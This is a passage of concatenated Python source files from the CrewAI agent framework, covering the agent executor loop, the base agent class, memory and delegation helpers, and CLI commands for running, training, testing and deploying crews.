output = AgentAction("_Exception", error, error) self.have_forced_answer = True yield AgentStep(action=output, observation=error) return intermediate_steps = self._prepare_intermediate_steps(intermediate_steps) # Call the LLM to see what to do. output = self.agent.plan( intermediate_steps, callbacks=run_manager.get_child() if run_manager else None, **inputs, ) except OutputParserException as e: if isinstance(self.handle_parsing_errors, bool): raise_error = not self.handle_parsing_errors else: raise_error = False if raise_error: raise ValueError( "An output parsing error occurred. " "In order to pass this error back to the agent and have it try " "again, pass `handle_parsing_errors=True` to the AgentExecutor. 
" f"This is the error: {str(e)}" ) str(e) if isinstance(self.handle_parsing_errors, bool): if e.send_to_llm: observation = f"\n{str(e.observation)}" str(e.llm_output) else: observation = "" elif isinstance(self.handle_parsing_errors, str): observation = f"\n{self.handle_parsing_errors}" elif callable(self.handle_parsing_errors): observation = f"\n{self.handle_parsing_errors(e)}" else: raise ValueError("Got unexpected type of `handle_parsing_errors`") output = AgentAction("_Exception", observation, "") if run_manager: run_manager.on_agent_action(output, color="green") tool_run_kwargs = self.agent.tool_run_logging_kwargs() observation = ExceptionTool().run( output.tool_input, verbose=False, color=None, callbacks=run_manager.get_child() if run_manager else None, **tool_run_kwargs, ) if self._should_force_answer(): error = self._i18n.errors("force_final_answer") output = AgentAction("_Exception", error, error) yield AgentStep(action=output, observation=error) return yield AgentStep(action=output, observation=observation) return except Exception as e: if LLMContextLengthExceededException(str(e))._is_context_limit_error( str(e) ): output = self._handle_context_length_error( intermediate_steps, run_manager, inputs ) if isinstance(output, AgentFinish): yield output elif isinstance(output, list): for step in output: yield step return raise e # If the tool chosen is the finishing tool, then we end and return. if isinstance(output, AgentFinish): if self.should_ask_for_human_input: human_feedback = self._ask_human_input(output.return_values["output"]) if self.crew and self.crew._train: self._handle_crew_training_output(output, human_feedback) # Making sure we only ask for it once, so disabling for the next thought loop self.should_ask_for_human_input = False action = AgentAction( tool="Human Input", tool_input=human_feedback, log=output.log ) yield AgentStep( action=action, observation=self._i18n.slice("human_feedback").format( human_feedback=human_feedback ), ) return else: if self.crew and self.crew._train: self._handle_crew_training_output(output) yield output return self._create_short_term_memory(output) actions: List[AgentAction] actions = [output] if isinstance(output, AgentAction) else output yield from actions for agent_action in actions: if run_manager: run_manager.on_agent_action(agent_action, color="green") tool_usage = ToolUsage( tools_handler=self.tools_handler, # type: ignore # Argument "tools_handler" to "ToolUsage" has incompatible type "ToolsHandler | None"; expected "ToolsHandler" tools=self.tools, # type: ignore # Argument "tools" to "ToolUsage" has incompatible type "Sequence[BaseTool]"; expected "list[BaseTool]" original_tools=self.original_tools, tools_description=self.tools_description, tools_names=self.tools_names, function_calling_llm=self.function_calling_llm, task=self.task, agent=self.crew_agent, action=agent_action, ) tool_calling = tool_usage.parse(agent_action.log) if isinstance(tool_calling, ToolUsageErrorException): observation = tool_calling.message else: if tool_calling.tool_name.casefold().strip() in [ name.casefold().strip() for name in name_to_tool_map ] or tool_calling.tool_name.casefold().replace("_", " ") in [ name.casefold().strip() for name in name_to_tool_map ]: observation = tool_usage.use(tool_calling, agent_action.log) else: observation = self._i18n.errors("wrong_tool_name").format( tool=tool_calling.tool_name, tools=", ".join([tool.name.casefold() for tool in self.tools]), ) yield AgentStep(action=agent_action, observation=observation) def 
_handle_crew_training_output( self, output: AgentFinish, human_feedback: str | None = None ) -> None: """Function to handle the process of the training data.""" agent_id = str(self.crew_agent.id) if ( CrewTrainingHandler(TRAINING_DATA_FILE).load() and not self.should_ask_for_human_input ): training_data = CrewTrainingHandler(TRAINING_DATA_FILE).load() if training_data.get(agent_id): training_data[agent_id][self.crew._train_iteration][ "improved_output" ] = output.return_values["output"] CrewTrainingHandler(TRAINING_DATA_FILE).save(training_data) if self.should_ask_for_human_input and human_feedback is not None: training_data = { "initial_output": output.return_values["output"], "human_feedback": human_feedback, "agent": agent_id, "agent_role": self.crew_agent.role, } CrewTrainingHandler(TRAINING_DATA_FILE).append( self.crew._train_iteration, agent_id, training_data ) def _handle_context_length( self, intermediate_steps: List[Tuple[AgentAction, str]] ) -> List[Tuple[AgentAction, str]]: text = intermediate_steps[0][1] original_action = intermediate_steps[0][0] text_splitter = RecursiveCharacterTextSplitter( separators=["\n\n", "\n"], chunk_size=8000, chunk_overlap=500, ) if self._fit_context_window_strategy == "summarize": docs = text_splitter.create_documents([text]) self._logger.log( "debug", "Summarizing Content, it is recommended to use a RAG tool", color="bold_blue", ) summarize_chain = load_summarize_chain( self.llm, chain_type="map_reduce", verbose=True ) summarized_docs = [] for doc in docs: summary = summarize_chain.invoke( {"input_documents": [doc]}, return_only_outputs=True ) summarized_docs.append(summary["output_text"]) formatted_results = "\n\n".join(summarized_docs) summary_step = AgentStep( action=AgentAction( tool=original_action.tool, tool_input=original_action.tool_input, log=original_action.log, ), observation=formatted_results, ) summary_tuple = (summary_step.action, summary_step.observation) return [summary_tuple] return intermediate_steps def _handle_context_length_error( self, intermediate_steps: List[Tuple[AgentAction, str]], run_manager: Optional[CallbackManagerForChainRun], inputs: Dict[str, str], ) -> Union[AgentFinish, List[AgentStep]]: self._logger.log( "debug", "Context length exceeded. Asking user if they want to use summarize prompt to fit, this will reduce context length.", color="yellow", ) user_choice = click.confirm( "Context length exceeded. Do you want to summarize the text to fit models context window?" ) if user_choice: self._logger.log( "debug", "Context length exceeded. Using summarize prompt to fit, this will reduce context length.", color="bold_blue", ) intermediate_steps = self._handle_context_length(intermediate_steps) output = self.agent.plan( intermediate_steps, callbacks=run_manager.get_child() if run_manager else None, **inputs, ) if isinstance(output, AgentFinish): return output elif isinstance(output, AgentAction): return [AgentStep(action=output, observation=None)] else: return [AgentStep(action=action, observation=None) for action in output] else: self._logger.log( "debug", "Context length exceeded. Consider using smaller text or RAG tools from crewai_tools.", color="red", ) raise SystemExit( "Context length exceeded and user opted not to summarize. Consider using smaller text or RAG tools from crewai_tools." 
) File: src/crewai/agents/cache/__init__.py from .cache_handler import CacheHandler __all__ = ["CacheHandler"] File: src/crewai/agents/cache/cache_handler.py from typing import Any, Dict, Optional from pydantic import BaseModel, PrivateAttr class CacheHandler(BaseModel): """Callback handler for tool usage.""" _cache: Dict[str, Any] = PrivateAttr(default_factory=dict) def add(self, tool, input, output): self._cache[f"{tool}-{input}"] = output def read(self, tool, input) -> Optional[str]: return self._cache.get(f"{tool}-{input}") File: src/crewai/agents/agent_builder/base_agent.py import uuid from abc import ABC, abstractmethod from copy import copy as shallow_copy from hashlib import md5 from typing import Any, Dict, List, Optional, TypeVar from pydantic import ( UUID4, BaseModel, Field, InstanceOf, PrivateAttr, field_validator, model_validator, ) from pydantic_core import PydanticCustomError from crewai.agents.agent_builder.utilities.base_token_process import TokenProcess from crewai.agents.cache.cache_handler import CacheHandler from crewai.agents.tools_handler import ToolsHandler from crewai.utilities import I18N, Logger, RPMController from crewai.utilities.config import process_config T = TypeVar("T", bound="BaseAgent") class BaseAgent(ABC, BaseModel): """Abstract Base Class for all third party agents compatible with CrewAI. Attributes: id (UUID4): Unique identifier for the agent. role (str): Role of the agent. goal (str): Objective of the agent. backstory (str): Backstory of the agent. cache (bool): Whether the agent should use a cache for tool usage. config (Optional[Dict[str, Any]]): Configuration for the agent. verbose (bool): Verbose mode for the Agent Execution. max_rpm (Optional[int]): Maximum number of requests per minute for the agent execution. allow_delegation (bool): Allow delegation of tasks to agents. tools (Optional[List[Any]]): Tools at the agent's disposal. max_iter (Optional[int]): Maximum iterations for an agent to execute a task. agent_executor (InstanceOf): An instance of the CrewAgentExecutor class. llm (Any): Language model that will run the agent. crew (Any): Crew to which the agent belongs. i18n (I18N): Internationalization settings. cache_handler (InstanceOf[CacheHandler]): An instance of the CacheHandler class. tools_handler (InstanceOf[ToolsHandler]): An instance of the ToolsHandler class. max_tokens: Maximum number of tokens for the agent to generate in a response. Methods: execute_task(task: Any, context: Optional[str] = None, tools: Optional[List[Any]] = None) -> str: Abstract method to execute a task. create_agent_executor(tools=None) -> None: Abstract method to create an agent executor. _parse_tools(tools: List[Any]) -> List[Any]: Abstract method to parse tools. get_delegation_tools(agents: List["BaseAgent"]): Abstract method to set the agents task tools for handling delegation and question asking to other agents in crew. get_output_converter(llm, model, instructions): Abstract method to get the converter class for the agent to create json/pydantic outputs. interpolate_inputs(inputs: Dict[str, Any]) -> None: Interpolate inputs into the agent description and backstory. set_cache_handler(cache_handler: CacheHandler) -> None: Set the cache handler for the agent. increment_formatting_errors() -> None: Increment formatting errors. copy() -> "BaseAgent": Create a copy of the agent. set_rpm_controller(rpm_controller: RPMController) -> None: Set the rpm controller for the agent. set_private_attrs() -> "BaseAgent": Set private attributes. 
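
    Minimal illustrative subclass (a sketch only, with made-up names; not part
    of the library)::

        class EchoAgent(BaseAgent):
            def execute_task(self, task, context=None, tools=None) -> str:
                return f"{self.role} echoing: {task}"

            def create_agent_executor(self, tools=None) -> None:
                self.agent_executor = None

            def _parse_tools(self, tools):
                return tools or []

            def get_delegation_tools(self, agents):
                return []

            def get_output_converter(self, llm, text, model, instructions):
                return None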
""" __hash__ = object.__hash__ # type: ignore _logger: Logger = PrivateAttr(default_factory=lambda: Logger(verbose=False)) _rpm_controller: Optional[RPMController] = PrivateAttr(default=None) _request_within_rpm_limit: Any = PrivateAttr(default=None) _original_role: Optional[str] = PrivateAttr(default=None) _original_goal: Optional[str] = PrivateAttr(default=None) _original_backstory: Optional[str] = PrivateAttr(default=None) _token_process: TokenProcess = PrivateAttr(default_factory=TokenProcess) id: UUID4 = Field(default_factory=uuid.uuid4, frozen=True) formatting_errors: int = Field( default=0, description="Number of formatting errors." ) role: str = Field(description="Role of the agent") goal: str = Field(description="Objective of the agent") backstory: str = Field(description="Backstory of the agent") config: Optional[Dict[str, Any]] = Field( description="Configuration for the agent", default=None, exclude=True ) cache: bool = Field( default=True, description="Whether the agent should use a cache for tool usage." ) verbose: bool = Field( default=False, description="Verbose mode for the Agent Execution" ) max_rpm: Optional[int] = Field( default=None, description="Maximum number of requests per minute for the agent execution to be respected.", ) allow_delegation: bool = Field( default=True, description="Allow delegation of tasks to agents" ) tools: Optional[List[Any]] = Field( default_factory=list, description="Tools at agents' disposal" ) max_iter: Optional[int] = Field( default=25, description="Maximum iterations for an agent to execute a task" ) agent_executor: InstanceOf = Field( default=None, description="An instance of the CrewAgentExecutor class." ) llm: Any = Field( default=None, description="Language model that will run the agent." ) crew: Any = Field(default=None, description="Crew to which the agent belongs.") i18n: I18N = Field(default=I18N(), description="Internationalization settings.") cache_handler: InstanceOf[CacheHandler] = Field( default=None, description="An instance of the CacheHandler class." ) tools_handler: InstanceOf[ToolsHandler] = Field( default=None, description="An instance of the ToolsHandler class." ) max_tokens: Optional[int] = Field( default=None, description="Maximum number of tokens for the agent's execution." 
) @model_validator(mode="before") @classmethod def process_model_config(cls, values): return process_config(values, cls) @model_validator(mode="after") def validate_and_set_attributes(self): # Validate required fields for field in ["role", "goal", "backstory"]: if getattr(self, field) is None: raise ValueError( f"{field} must be provided either directly or through config" ) # Set private attributes self._logger = Logger(verbose=self.verbose) if self.max_rpm and not self._rpm_controller: self._rpm_controller = RPMController( max_rpm=self.max_rpm, logger=self._logger ) if not self._token_process: self._token_process = TokenProcess() return self @field_validator("id", mode="before") @classmethod def _deny_user_set_id(cls, v: Optional[UUID4]) -> None: if v: raise PydanticCustomError( "may_not_set_field", "This field is not to be set by the user.", {} ) @model_validator(mode="after") def set_private_attrs(self): """Set private attributes.""" self._logger = Logger(verbose=self.verbose) if self.max_rpm and not self._rpm_controller: self._rpm_controller = RPMController( max_rpm=self.max_rpm, logger=self._logger ) if not self._token_process: self._token_process = TokenProcess() return self @property def key(self): source = [self.role, self.goal, self.backstory] return md5("|".join(source).encode(), usedforsecurity=False).hexdigest() @abstractmethod def execute_task( self, task: Any, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> str: pass @abstractmethod def create_agent_executor(self, tools=None) -> None: pass @abstractmethod def _parse_tools(self, tools: List[Any]) -> List[Any]: pass @abstractmethod def get_delegation_tools(self, agents: List["BaseAgent"]) -> List[Any]: """Set the task tools that init BaseAgenTools class.""" pass @abstractmethod def get_output_converter( self, llm: Any, text: str, model: type[BaseModel] | None, instructions: str ): """Get the converter class for the agent to create json/pydantic outputs.""" pass def copy(self: T) -> T: # type: ignore # Signature of "copy" incompatible with supertype "BaseModel" """Create a deep copy of the Agent.""" exclude = { "id", "_logger", "_rpm_controller", "_request_within_rpm_limit", "_token_process", "agent_executor", "tools", "tools_handler", "cache_handler", "llm", } # Copy llm and clear callbacks existing_llm = shallow_copy(self.llm) existing_llm.callbacks = [] copied_data = self.model_dump(exclude=exclude) copied_data = {k: v for k, v in copied_data.items() if v is not None} copied_agent = type(self)(**copied_data, llm=existing_llm, tools=self.tools) return copied_agent def interpolate_inputs(self, inputs: Dict[str, Any]) -> None: """Interpolate inputs into the agent description and backstory.""" if self._original_role is None: self._original_role = self.role if self._original_goal is None: self._original_goal = self.goal if self._original_backstory is None: self._original_backstory = self.backstory if inputs: self.role = self._original_role.format(**inputs) self.goal = self._original_goal.format(**inputs) self.backstory = self._original_backstory.format(**inputs) def set_cache_handler(self, cache_handler: CacheHandler) -> None: """Set the cache handler for the agent. Args: cache_handler: An instance of the CacheHandler class. 
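
        Note: this also re-creates the agent executor so the new cache handler
        takes effect immediately.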
""" self.tools_handler = ToolsHandler() if self.cache: self.cache_handler = cache_handler self.tools_handler.cache = cache_handler self.create_agent_executor() def increment_formatting_errors(self) -> None: self.formatting_errors += 1 def set_rpm_controller(self, rpm_controller: RPMController) -> None: """Set the rpm controller for the agent. Args: rpm_controller: An instance of the RPMController class. """ if not self._rpm_controller: self._rpm_controller = rpm_controller self.create_agent_executor() File: src/crewai/agents/agent_builder/__init__.py File: src/crewai/agents/agent_builder/base_agent_executor_mixin.py import time from typing import TYPE_CHECKING, Optional from crewai.memory.entity.entity_memory_item import EntityMemoryItem from crewai.memory.long_term.long_term_memory_item import LongTermMemoryItem from crewai.utilities.converter import ConverterError from crewai.utilities.evaluators.task_evaluator import TaskEvaluator from crewai.utilities import I18N if TYPE_CHECKING: from crewai.crew import Crew from crewai.task import Task from crewai.agents.agent_builder.base_agent import BaseAgent class CrewAgentExecutorMixin: crew: Optional["Crew"] crew_agent: Optional["BaseAgent"] task: Optional["Task"] iterations: int force_answer_max_iterations: int have_forced_answer: bool _i18n: I18N def _should_force_answer(self) -> bool: """Determine if a forced answer is required based on iteration count.""" return ( self.iterations == self.force_answer_max_iterations ) and not self.have_forced_answer def _create_short_term_memory(self, output) -> None: """Create and save a short-term memory item if conditions are met.""" if ( self.crew and self.crew_agent and self.task and "Action: Delegate work to coworker" not in output.log ): try: if ( hasattr(self.crew, "_short_term_memory") and self.crew._short_term_memory ): self.crew._short_term_memory.save( value=output.log, metadata={ "observation": self.task.description, }, agent=self.crew_agent.role, ) except Exception as e: print(f"Failed to add to short term memory: {e}") pass def _create_long_term_memory(self, output) -> None: """Create and save long-term and entity memory items based on evaluation.""" if ( self.crew and self.crew.memory and self.crew._long_term_memory and self.crew._entity_memory and self.task and self.crew_agent ): try: ltm_agent = TaskEvaluator(self.crew_agent) evaluation = ltm_agent.evaluate(self.task, output.log) if isinstance(evaluation, ConverterError): return long_term_memory = LongTermMemoryItem( task=self.task.description, agent=self.crew_agent.role, quality=evaluation.quality, datetime=str(time.time()), expected_output=self.task.expected_output, metadata={ "suggestions": evaluation.suggestions, "quality": evaluation.quality, }, ) self.crew._long_term_memory.save(long_term_memory) for entity in evaluation.entities: entity_memory = EntityMemoryItem( name=entity.name, type=entity.type, description=entity.description, relationships="\n".join( [f"- {r}" for r in entity.relationships] ), ) self.crew._entity_memory.save(entity_memory) except AttributeError as e: print(f"Missing attributes for long term memory: {e}") pass except Exception as e: print(f"Failed to add to long term memory: {e}") pass def _ask_human_input(self, final_answer: dict) -> str: """Prompt human input for final decision making.""" return input( self._i18n.slice("getting_input").format(final_answer=final_answer) ) File: src/crewai/agents/agent_builder/utilities/base_output_converter.py from abc import ABC, abstractmethod from typing import Any, Optional 
from pydantic import BaseModel, Field class OutputConverter(BaseModel, ABC): """ Abstract base class for converting task results into structured formats. This class provides a framework for converting unstructured text into either Pydantic models or JSON, tailored for specific agent requirements. It uses a language model to interpret and structure the input text based on given instructions. Attributes: text (str): The input text to be converted. llm (Any): The language model used for conversion. model (Any): The target model for structuring the output. instructions (str): Specific instructions for the conversion process. max_attempts (int): Maximum number of conversion attempts (default: 3). """ text: str = Field(description="Text to be converted.") llm: Any = Field(description="The language model to be used to convert the text.") model: Any = Field(description="The model to be used to convert the text.") instructions: str = Field(description="Conversion instructions to the LLM.") max_attempts: Optional[int] = Field( description="Max number of attempts to try to get the output formatted.", default=3, ) @abstractmethod def to_pydantic(self, current_attempt=1): """Convert text to pydantic.""" pass @abstractmethod def to_json(self, current_attempt=1): """Convert text to json.""" pass @property @abstractmethod def is_gpt(self) -> bool: """Return if llm provided is of gpt from openai.""" pass File: src/crewai/agents/agent_builder/utilities/__init__.py File: src/crewai/agents/agent_builder/utilities/base_token_process.py from crewai.types.usage_metrics import UsageMetrics class TokenProcess: total_tokens: int = 0 prompt_tokens: int = 0 completion_tokens: int = 0 successful_requests: int = 0 def sum_prompt_tokens(self, tokens: int): self.prompt_tokens = self.prompt_tokens + tokens self.total_tokens = self.total_tokens + tokens def sum_completion_tokens(self, tokens: int): self.completion_tokens = self.completion_tokens + tokens self.total_tokens = self.total_tokens + tokens def sum_successful_requests(self, requests: int): self.successful_requests = self.successful_requests + requests def get_summary(self) -> UsageMetrics: return UsageMetrics( total_tokens=self.total_tokens, prompt_tokens=self.prompt_tokens, completion_tokens=self.completion_tokens, successful_requests=self.successful_requests, ) File: src/crewai/agents/agent_builder/utilities/base_agent_tool.py from abc import ABC, abstractmethod from typing import List, Optional, Union from pydantic import BaseModel, Field from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.task import Task from crewai.utilities import I18N class BaseAgentTools(BaseModel, ABC): """Default tools around agent delegation""" agents: List[BaseAgent] = Field(description="List of agents in this crew.") i18n: I18N = Field(default=I18N(), description="Internationalization settings.") @abstractmethod def tools(self): pass def _get_coworker(self, coworker: Optional[str], **kwargs) -> Optional[str]: coworker = coworker or kwargs.get("co_worker") or kwargs.get("coworker") if coworker: is_list = coworker.startswith("[") and coworker.endswith("]") if is_list: coworker = coworker[1:-1].split(",")[0] return coworker def delegate_work( self, task: str, context: str, coworker: Optional[str] = None, **kwargs ): """Useful to delegate a specific task to a coworker passing all necessary context and names.""" coworker = self._get_coworker(coworker, **kwargs) return self._execute(coworker, task, context) def ask_question( self, question: str, context: str, 
coworker: Optional[str] = None, **kwargs ): """Useful to ask a question, opinion or take from a coworker passing all necessary context and names.""" coworker = self._get_coworker(coworker, **kwargs) return self._execute(coworker, question, context) def _execute( self, agent_name: Union[str, None], task: str, context: Union[str, None] ): """Execute the command.""" try: if agent_name is None: agent_name = "" # It is important to remove the quotes from the agent name. # The reason we have to do this is because less-powerful LLM's # have difficulty producing valid JSON. # As a result, we end up with invalid JSON that is truncated like this: # {"task": "....", "coworker": ".... # when it should look like this: # {"task": "....", "coworker": "...."} agent_name = agent_name.casefold().replace('"', "").replace("\n", "") agent = [ # type: ignore # Incompatible types in assignment (expression has type "list[BaseAgent]", variable has type "str | None") available_agent for available_agent in self.agents if available_agent.role.casefold().replace("\n", "") == agent_name ] except Exception as _: return self.i18n.errors("agent_tool_unexsiting_coworker").format( coworkers="\n".join( [f"- {agent.role.casefold()}" for agent in self.agents] ) ) if not agent: return self.i18n.errors("agent_tool_unexsiting_coworker").format( coworkers="\n".join( [f"- {agent.role.casefold()}" for agent in self.agents] ) ) agent = agent[0] task_with_assigned_agent = Task( # type: ignore # Incompatible types in assignment (expression has type "Task", variable has type "str") description=task, agent=agent, expected_output="Your best answer to your coworker asking you this, accounting for the context shared.", ) return agent.execute_task(task_with_assigned_agent, context) File: src/crewai/cli/run_crew.py import subprocess import click def run_crew() -> None: """ Run the crew by running a command in the Poetry environment. """ command = ["poetry", "run", "run_crew"] try: result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while running the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/__init__.py File: src/crewai/cli/reset_memories_command.py import subprocess import click from crewai.memory.entity.entity_memory import EntityMemory from crewai.memory.long_term.long_term_memory import LongTermMemory from crewai.memory.short_term.short_term_memory import ShortTermMemory from crewai.utilities.task_output_storage_handler import TaskOutputStorageHandler def reset_memories_command(long, short, entity, kickoff_outputs, all) -> None: """ Reset the crew memories. Args: long (bool): Whether to reset the long-term memory. short (bool): Whether to reset the short-term memory. entity (bool): Whether to reset the entity memory. kickoff_outputs (bool): Whether to reset the latest kickoff task outputs. all (bool): Whether to reset all memories. 
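
    For example, reset_memories_command(long=False, short=True, entity=False,
    kickoff_outputs=False, all=False) clears only the short-term memory store.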
""" try: if all: ShortTermMemory().reset() EntityMemory().reset() LongTermMemory().reset() TaskOutputStorageHandler().reset() click.echo("All memories have been reset.") else: if long: LongTermMemory().reset() click.echo("Long term memory has been reset.") if short: ShortTermMemory().reset() click.echo("Short term memory has been reset.") if entity: EntityMemory().reset() click.echo("Entity memory has been reset.") if kickoff_outputs: TaskOutputStorageHandler().reset() click.echo("Latest Kickoff outputs stored has been reset.") except subprocess.CalledProcessError as e: click.echo(f"An error occurred while resetting the memories: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/evaluate_crew.py import subprocess import click def evaluate_crew(n_iterations: int, model: str) -> None: """ Test and Evaluate the crew by running a command in the Poetry environment. Args: n_iterations (int): The number of iterations to test the crew. model (str): The model to test the crew with. """ command = ["poetry", "run", "test", str(n_iterations), model] try: if n_iterations <= 0: raise ValueError("The number of iterations must be a positive integer.") result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while testing the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/replay_from_task.py import subprocess import click def replay_task_command(task_id: str) -> None: """ Replay the crew execution from a specific task. Args: task_id (str): The ID of the task to replay from. """ command = ["poetry", "run", "replay", task_id] try: result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while replaying the task: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/cli.py from typing import Optional import click import pkg_resources from crewai.cli.create_crew import create_crew from crewai.cli.create_pipeline import create_pipeline from crewai.memory.storage.kickoff_task_outputs_storage import ( KickoffTaskOutputsSQLiteStorage, ) from .authentication.main import AuthenticationCommand from .deploy.main import DeployCommand from .evaluate_crew import evaluate_crew from .install_crew import install_crew from .replay_from_task import replay_task_command from .reset_memories_command import reset_memories_command from .run_crew import run_crew from .train_crew import train_crew @click.group() def crewai(): """Top-level command group for crewai.""" @crewai.command() @click.argument("type", type=click.Choice(["crew", "pipeline"])) @click.argument("name") @click.option( "--router", is_flag=True, help="Create a pipeline with router functionality" ) def create(type, name, router): """Create a new crew or pipeline.""" if type == "crew": create_crew(name) elif type == "pipeline": create_pipeline(name, router) else: click.secho("Error: Invalid type. 
Must be 'crew' or 'pipeline'.", fg="red") @crewai.command() @click.option( "--tools", is_flag=True, help="Show the installed version of crewai tools" ) def version(tools): """Show the installed version of crewai.""" crewai_version = pkg_resources.get_distribution("crewai").version click.echo(f"crewai version: {crewai_version}") if tools: try: tools_version = pkg_resources.get_distribution("crewai-tools").version click.echo(f"crewai tools version: {tools_version}") except pkg_resources.DistributionNotFound: click.echo("crewai tools not installed") @crewai.command() @click.option( "-n", "--n_iterations", type=int, default=5, help="Number of iterations to train the crew", ) @click.option( "-f", "--filename", type=str, default="trained_agents_data.pkl", help="Path to a custom file for training", ) def train(n_iterations: int, filename: str): """Train the crew.""" click.echo(f"Training the Crew for {n_iterations} iterations") train_crew(n_iterations, filename) @crewai.command() @click.option( "-t", "--task_id", type=str, help="Replay the crew from this task ID, including all subsequent tasks.", ) def replay(task_id: str) -> None: """ Replay the crew execution from a specific task. Args: task_id (str): The ID of the task to replay from. """ try: click.echo(f"Replaying the crew from task {task_id}") replay_task_command(task_id) except Exception as e: click.echo(f"An error occurred while replaying: {e}", err=True) @crewai.command() def log_tasks_outputs() -> None: """ Retrieve your latest crew.kickoff() task outputs. """ try: storage = KickoffTaskOutputsSQLiteStorage() tasks = storage.load() if not tasks: click.echo( "No task outputs found. Only crew kickoff task outputs are logged." ) return for index, task in enumerate(tasks, 1): click.echo(f"Task {index}: {task['task_id']}") click.echo(f"Description: {task['expected_output']}") click.echo("------") except Exception as e: click.echo(f"An error occurred while logging task outputs: {e}", err=True) @crewai.command() @click.option("-l", "--long", is_flag=True, help="Reset LONG TERM memory") @click.option("-s", "--short", is_flag=True, help="Reset SHORT TERM memory") @click.option("-e", "--entities", is_flag=True, help="Reset ENTITIES memory") @click.option( "-k", "--kickoff-outputs", is_flag=True, help="Reset LATEST KICKOFF TASK OUTPUTS", ) @click.option("-a", "--all", is_flag=True, help="Reset ALL memories") def reset_memories(long, short, entities, kickoff_outputs, all): """ Reset the crew memories (long, short, entity, latest_crew_kickoff_ouputs). This will delete all the data saved. """ try: if not all and not (long or short or entities or kickoff_outputs): click.echo( "Please specify at least one memory type to reset using the appropriate flags." ) return reset_memories_command(long, short, entities, kickoff_outputs, all) except Exception as e: click.echo(f"An error occurred while resetting memories: {e}", err=True) @crewai.command() @click.option( "-n", "--n_iterations", type=int, default=3, help="Number of iterations to Test the crew", ) @click.option( "-m", "--model", type=str, default="gpt-4o-mini", help="LLM Model to run the tests on the Crew. 
For now only accepting only OpenAI models.", ) def test(n_iterations: int, model: str): """Test the crew and evaluate the results.""" click.echo(f"Testing the crew for {n_iterations} iterations with model {model}") evaluate_crew(n_iterations, model) @crewai.command() def install(): """Install the Crew.""" install_crew() @crewai.command() def run(): """Run the Crew.""" click.echo("Running the Crew") run_crew() @crewai.command() def signup(): """Sign Up/Login to CrewAI+.""" AuthenticationCommand().signup() @crewai.command() def login(): """Sign Up/Login to CrewAI+.""" AuthenticationCommand().signup() # DEPLOY CREWAI+ COMMANDS @crewai.group() def deploy(): """Deploy the Crew CLI group.""" pass @deploy.command(name="create") @click.option("-y", "--yes", is_flag=True, help="Skip the confirmation prompt") def deploy_create(yes: bool): """Create a Crew deployment.""" deploy_cmd = DeployCommand() deploy_cmd.create_crew(yes) @deploy.command(name="list") def deploy_list(): """List all deployments.""" deploy_cmd = DeployCommand() deploy_cmd.list_crews() @deploy.command(name="push") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deploy_push(uuid: Optional[str]): """Deploy the Crew.""" deploy_cmd = DeployCommand() deploy_cmd.deploy(uuid=uuid) @deploy.command(name="status") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deply_status(uuid: Optional[str]): """Get the status of a deployment.""" deploy_cmd = DeployCommand() deploy_cmd.get_crew_status(uuid=uuid) @deploy.command(name="logs") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deploy_logs(uuid: Optional[str]): """Get the logs of a deployment.""" deploy_cmd = DeployCommand() deploy_cmd.get_crew_logs(uuid=uuid) @deploy.command(name="remove") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deploy_remove(uuid: Optional[str]): """Remove a deployment.""" deploy_cmd = DeployCommand() deploy_cmd.remove_crew(uuid=uuid) if __name__ == "__main__": crewai() File: src/crewai/cli/train_crew.py import subprocess import click def train_crew(n_iterations: int, filename: str) -> None: """ Train the crew by running a command in the Poetry environment. Args: n_iterations (int): The number of iterations to train the crew. 
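        filename (str): Path of the ".pkl" file the trained agent data is written to.

    Example (illustrative call; it builds and runs "poetry run train 5 trained_agents_data.pkl"):
        train_crew(5, "trained_agents_data.pkl")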
""" command = ["poetry", "run", "train", str(n_iterations), filename] try: if n_iterations <= 0: raise ValueError("The number of iterations must be a positive integer.") if not filename.endswith(".pkl"): raise ValueError("The filename must not end with .pkl") result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while training the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/utils.py import click def copy_template(src, dst, name, class_name, folder_name): """Copy a file from src to dst.""" with open(src, "r") as file: content = file.read() # Interpolate the content content = content.replace("{{name}}", name) content = content.replace("{{crew_name}}", class_name) content = content.replace("{{folder_name}}", folder_name) # Write the interpolated content to the new file with open(dst, "w") as file: file.write(content) click.secho(f" - Created {dst}", fg="green") File: src/crewai/cli/install_crew.py import subprocess import click def install_crew() -> None: """ Install the crew by running the Poetry command to lock and install. """ try: subprocess.run(["poetry", "lock"], check=True, capture_output=False, text=True) subprocess.run( ["poetry", "install"], check=True, capture_output=False, text=True ) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while running the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/create_crew.py from pathlib import Path import click from crewai.cli.utils import copy_template def create_crew(name, parent_folder=None): """Create a new crew.""" folder_name = name.replace(" ", "_").replace("-", "_").lower() class_name = name.replace("_", " ").replace("-", " ").title().replace(" ", "") if parent_folder: folder_path = Path(parent_folder) / folder_name else: folder_path = Path(folder_name) click.secho( f"Creating {'crew' if parent_folder else 'folder'} {folder_name}...", fg="green", 